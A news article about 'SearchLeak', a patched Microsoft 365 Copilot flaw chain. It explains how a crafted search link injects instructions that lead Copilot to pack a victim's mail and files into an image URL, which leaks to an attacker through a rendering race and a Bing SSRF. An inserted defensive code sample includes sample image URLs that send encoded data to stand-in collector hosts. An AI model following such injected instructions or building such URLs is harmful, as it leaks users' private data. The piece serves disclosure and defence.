Microsoft 365 Copilot can be turned into a one-click data theft tool — inbox, OneDrive, and SharePoint data all at risk, so patch now


  • Varonis uncovered “SearchLeak,” chaining three flaws in Microsoft 365 Copilot to enable one‑click data theft
  • Attack exploited prompt injection, HTML race condition, and Bing SSRF to exfiltrate inbox, OneDrive, and SharePoint data
  • Microsoft patched CVE‑2026‑42824 earlier this month, rating it 10/10 critical

Experts have uncovered a way to turn Microsoft 365 Copilot into a one-click data theft tool, capable of exfiltrating sensitive information from people’s inbox, OneDrive, and SharePoint instances.

The technique, which Microsoft has since patched, was developed by security researchers at Varonis, who dubbed it SearchLeak and explained that it works by chaining together three vulnerabilities.

Separately, these three can’t do much harm, but together, they are strong enough to warrant a patch.


Exfiltration proxy

The three flaws being chained are a parameter-to-prompt injection, an HTML rendering race condition, and a content-security-policy (CSP) bypass enabled by Bing server-side request forgery (SSRF).

The attack starts when a victim clicks a specially crafted Microsoft 365 Copilot Enterprise Search link. The URL holds hidden instructions in the search query parameter, telling Copilot to search the victim's emails, OneDrive files, SharePoint documents, or calendar data and include the results inside an image URL.

As Copilot generates its response, a race condition causes the browser to briefly render attacker-controlled HTML before Microsoft's sanitization process completes. This lets an image tag carrying the stolen data load, triggering the outbound request.

Finally, the image request is routed through Bing’s “Search by Image” feature. Because of the SSRF flaw, Bing fetches the attacker-controlled URL on the victim’s behalf, bypassing Content Security Policy protections. The sensitive data embedded in the URL is thus transmitted to the attacker's server, where they can recover it from web request logs.
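The three steps above hinge on two things the chat client controls: whether partially streamed model output ever reaches the DOM unsanitized, and whether an image URL that is nominally on an allowlisted host is allowed to carry a second, outbound URL (the proxy hop). The following is an added illustration of both checks, not code from Varonis, Microsoft or BleepingComputer; the host names, the `.invalid` sample domains, the query-length threshold, the `escapeHtml` helper and the `SafeStreamRenderer` sink interface are all assumptions made for the example.

```javascript
// Added example (not the vendor's or the researchers' code). Assumed image
// allowlist; a real deployment would derive this from its CSP img-src entry.
const ALLOWED_IMAGE_HOSTS = new Set(["cdn.example.invalid", "images.example.invalid"]);
const MAX_QUERY_LENGTH = 256; // assumed: longer query strings look like encoded payloads

// Does a parameter value itself look like a URL, even after one or two extra
// layers of percent-encoding? That is the shape of a "fetch this for me" hop.
function looksLikeUrl(value) {
  let v = value;
  for (let i = 0; i < 3; i++) {
    if (/^[a-z][a-z0-9+.-]*:\/\//i.test(v)) return true;
    let next;
    try { next = decodeURIComponent(v); } catch { return false; }
    if (next === v) return false;
    v = next;
  }
  return false;
}

// Verdict on a single image URL. An allowlisted host is not enough: the URL
// must also not instruct that host to fetch somewhere else, and must not
// carry an unusually large query string (the exfiltration channel itself).
function classifyImageUrl(raw) {
  let url;
  try { url = new URL(raw); } catch { return { allowed: false, reason: "unparseable URL" }; }
  if (url.protocol !== "https:") return { allowed: false, reason: "non-https scheme" };
  if (!ALLOWED_IMAGE_HOSTS.has(url.hostname)) return { allowed: false, reason: `host ${url.hostname} not allowlisted` };
  if (url.search.length > MAX_QUERY_LENGTH) return { allowed: false, reason: "query string too long" };
  for (const [key, value] of url.searchParams) {
    if (looksLikeUrl(value)) return { allowed: false, reason: `parameter ${key} carries a nested URL` };
  }
  return { allowed: true, reason: "ok" };
}

const MD_IMAGE = /!\[[^\]]*\]\(([^)\s]+)[^)]*\)/g;   // ![alt](url ...)
const HTML_IMG = /<img\b[^>]*>/gi;                   // whole <img ...> tag
const SRC_ATTR = /\bsrc\s*=\s*["']?([^"'\s>]+)/i;

// Strip every image (markdown or HTML) whose URL fails the checks above.
// Returns the cleaned text plus the list of what was removed and why.
function sanitizeModelOutput(text) {
  const blocked = [];
  const judge = (whole, src) => {
    const verdict = classifyImageUrl(src);
    if (verdict.allowed) return whole;
    blocked.push({ src, reason: verdict.reason });
    return "[image removed]";
  };
  const clean = text
    .replace(MD_IMAGE, (m, src) => judge(m, src))
    .replace(HTML_IMG, (tag) => { const m = SRC_ATTR.exec(tag); return judge(tag, m ? m[1] : ""); });
  return { clean, blocked };
}

function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => ({ "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" }[c]));
}

// The race condition described above lives in the gap between "markup
// inserted" and "sanitizer finished". This renderer closes the gap by showing
// only escaped plain text while the stream is open, and rendering rich content
// exactly once, after the complete response has been sanitized.
class SafeStreamRenderer {
  constructor(sink) { this.sink = sink; this.buffer = ""; this.done = false; } // sink = { showText, showRich } (assumed)
  push(chunk) {
    if (this.done) throw new Error("stream already finished");
    this.buffer += chunk;
    this.sink.showText(escapeHtml(this.buffer)); // interim view: no markup interpreted
  }
  finish() {
    this.done = true;
    const { clean, blocked } = sanitizeModelOutput(this.buffer);
    this.sink.showRich(clean);
    return blocked;
  }
}

// Constructed sample of a model response: one legitimate image, one image that
// asks an allowlisted host to fetch an outside URL (the proxy pattern), and one
// raw <img> tag pointing straight at an outside host.
const SAMPLE_RESPONSE = [
  "Here is the chart you asked for: ![chart](https://cdn.example.invalid/charts/q1.png)",
  "![x](https://images.example.invalid/search?view=detail&imgurl=https://collector.invalid/c?d=U3ViamVjdDogUGF5cm9sbA)",
  '<img src="https://collector.invalid/p.gif?d=secret">',
].join("\n");

function demo() {
  return sanitizeModelOutput(SAMPLE_RESPONSE); // blocks the second and third images
}

module.exports = { looksLikeUrl, classifyImageUrl, sanitizeModelOutput, escapeHtml, SafeStreamRenderer, SAMPLE_RESPONSE, demo };
```

The design point is that the allowlist check and the "no nested URL" check are separate: a CSP `img-src` entry only says which host may be contacted, not what that host may be asked to do, and the SSRF half of the chain works precisely because the allowlisted host is willing to fetch on the client's behalf.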

"Bing becomes an unwitting exfiltration proxy,” the researchers explained. “A classic SSRF, hiding in plain sight behind a CSP allowlist entry."

Varonis says that on the victim’s side, all they see is a normal Copilot search session, and stressed that AI has turned simple, easily addressed bugs, such as SSRF and HTML injection race conditions, into potent vulnerabilities.

Earlier this month, Microsoft patched the flaw, assigning it a maximum severity rating (10/10 critical), and tracking it as CVE-2026-42824.

Via BleepingComputer




Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.
